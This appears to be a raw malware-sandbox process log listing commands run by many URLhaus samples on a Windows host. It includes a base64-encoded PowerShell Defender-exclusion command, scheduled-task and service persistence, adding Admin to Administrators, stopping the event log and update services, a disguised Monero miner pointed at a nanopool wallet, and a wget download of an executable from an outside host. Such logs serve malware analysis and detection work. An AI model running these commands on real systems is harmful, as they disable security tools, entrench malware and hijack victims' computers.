cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10352 -ip 10352

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Users\Admin\Downloads\UrlHausFiles\VBVEd6f.exe

"C:\Users\Admin\Downloads\UrlHausFiles\VBVEd6f.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10352 -s 1176

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\timeout.exe

TIMEOUT /T 100

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F

C:\Users\Admin\Downloads\UrlHausFiles\del.exe

"C:\Users\Admin\Downloads\UrlHausFiles\del.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Maintained Maintained.cmd && Maintained.cmd

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\67A0.tmp\67A1.tmp\67A2.bat C:\Users\Admin\Downloads\UrlHausFiles\del.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\Admin\IOAshdohSha.exe"

C:\Windows\system32\net.exe

net localgroup Administrators Admin /add

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators Admin /add

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "Fix Getting Devices" /F

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\gaozw40v.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gaozw40v.exe"

C:\Users\Admin\Downloads\UrlHausFiles\njrtdhadawt.exe

"C:\Users\Admin\Downloads\UrlHausFiles\njrtdhadawt.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "Windows Optimize" /F

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "YIFRWLJF"

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "ChangeWallpaper" /F

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\vg9qcBa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\vg9qcBa.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "YIFRWLJF" binpath= "C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe" start= "auto"

C:\Users\Admin\Downloads\UrlHausFiles\SrbijaSetupHokej.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SrbijaSetupHokej.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\IOAshdohSha.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Local\Temp\is-FDA0C.tmp\SrbijaSetupHokej.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FDA0C.tmp\SrbijaSetupHokej.tmp" /SL5="$21364,3939740,937984,C:\Users\Admin\Downloads\UrlHausFiles\SrbijaSetupHokej.exe"

C:\Users\Admin\Downloads\UrlHausFiles\wallx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wallx.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\crss.exe'

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\vg9qcBa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\vg9qcBa.exe"

C:\Users\Admin\Downloads\UrlHausFiles\si.exe

"C:\Users\Admin\Downloads\UrlHausFiles\si.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "YIFRWLJF"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Users\Admin\Downloads\UrlHausFiles\A.I_1003H.exe

"C:\Users\Admin\Downloads\UrlHausFiles\A.I_1003H.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im tftp.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\98B2.tmp\98B3.tmp\98B4.bat C:\Users\Admin\Downloads\UrlHausFiles\wallx.exe"

C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe

C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Users\Admin\IOAshdohSha.exe

C:\Users\Admin\IOAshdohSha.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Users\Admin\Downloads\UrlHausFiles\PrintSpoofer.exe

"C:\Users\Admin\Downloads\UrlHausFiles\PrintSpoofer.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\tftp.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\IOAshdohSha.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe"

C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{2C57A37D-2ED2-4602-BF6E-99E06DF976FE}\CR_85700.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6e30a5d68,0x7ff6e30a5d74,0x7ff6e30a5d80

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\A.I_Run.cmd" "

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -standby-timeout-ac 0

C:\Users\Admin\AppData\Roaming\WallpaperX.exe

WallpaperX.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\CAFIEBKKJJDA" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 14428 -ip 14428

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -hibernate-timeout-ac 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 14428 -s 348

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1824 -ip 1824

C:\Windows\System32\nslookup.exe

C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1824 -ip 1824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SysWOW64\powercfg.exe

Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\sc.exe

sc stop PcaSvc

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 1524

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 1500

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "QKJNEQWA"

C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Users\Admin\Downloads\UrlHausFiles\NVIDIA.exe

"C:\Users\Admin\Downloads\UrlHausFiles\NVIDIA.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "QKJNEQWA"

C:\Users\Admin\Downloads\UrlHausFiles\cdb.exe

"C:\Users\Admin\Downloads\UrlHausFiles\cdb.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\nuke.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nuke.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe

C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\Sysnative\sfc.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\test12.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test12.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\Downloads\UrlHausFiles\help.scr /F

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im 2HIf.exe&&exit

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im 2HIf.exe&&exit

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Users\Admin\Downloads\UrlHausFiles\run2.exe

"C:\Users\Admin\Downloads\UrlHausFiles\run2.exe"

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\Sysnative\sfc.exe /t /deny everyone:f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\Downloads\UrlHausFiles\help.scr /F

C:\Users\Admin\Downloads\UrlHausFiles\china.exe

"C:\Users\Admin\Downloads\UrlHausFiles\china.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1ECA.tmp\1ECB.tmp\1ECC.bat C:\Users\Admin\Downloads\UrlHausFiles\run2.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\exbuild.exe

"C:\Users\Admin\Downloads\UrlHausFiles\exbuild.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"

C:\Users\Admin\Downloads\UrlHausFiles\beacon.exe

"C:\Users\Admin\Downloads\UrlHausFiles\beacon.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OEMzQzM0NzItMTMyNi00ODQwLUI2NUItRERFOERFOENDQzEwfSIgdXNlcmlkPSJ7QTU3Q0YwNDMtMzc4Mi00RjI3LUE2OTMtQzhCNzA0NkQ3N0UyfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezJDQTc3NEEyLTI3ODgtNDUwRi05NkMyLTUyMDBEQjY2QUNBMn0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M0MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMzEuMC42Nzc4Ljg2IiBhcD0ieDY0LXN0YWJsZS1zdGF0c2RlZl8xIiBsYW5nPSJ6aC1DTiIgYnJhbmQ9IiIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjU1IiBpaWQ9IntEQjI0RUREMy05OTIwLTVENUYtRkJCRS04RTc0M0Y3NDg2QzF9IiBjb2hvcnQ9IjE6Z3UvaTE5OiIgY29ob3J0bmFtZT0iU3RhYmxlIEluc3RhbGxzICZhbXA7IFZlcnNpb24gUGlucyI-PGV2ZW50IGV2ZW50dHlwZT0iOSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9lZGdlZGwubWUuZ3Z0MS5jb20vZWRnZWRsL3JlbGVhc2UyL2Nocm9tZS9hZG1neGx0NGQ1YzVyY3Rub3p3M3d6cGh3MndxXzEzMS4wLjY3NzguODYvMTMxLjAuNjc3OC44Nl9jaHJvbWVfaW5zdGFsbGVyLmV4ZSIgZG93bmxvYWRlZD0iMTE2MTE5NDA4IiB0b3RhbD0iMTE2MTE5NDA4IiBkb3dubG9hZF90aW1lX21zPSIxNzk2OCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI2IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNzg5MCIgZG93bmxvYWRfdGltZV9tcz0iMzgxOTkiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgaW5zdGFsbF90aW1lX21zPSI3Nzk2MCIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im 2HIf.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im 2HIf.exe

C:\Users\Admin\Downloads\UrlHausFiles\Nework.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Nework.exe"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Users\Admin\AppData\Roaming\new.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\Downloads\UrlHausFiles\foggy-mountains.exe

"C:\Users\Admin\Downloads\UrlHausFiles\foggy-mountains.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ff8f62bfd08,0x7ff8f62bfd14,0x7ff8f62bfd20

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\ProgramData\SMB.exe

C:\ProgramData\SMB.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'crss.exe'

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1912,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=1924 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1872,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2092,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:13

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=3252 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3960,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=4044 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4532,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=4544 /prefetch:9

C:\Users\Admin\Downloads\UrlHausFiles\ggg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ggg.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3224,i,344577115450505120,5493050804353127054,262144 --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

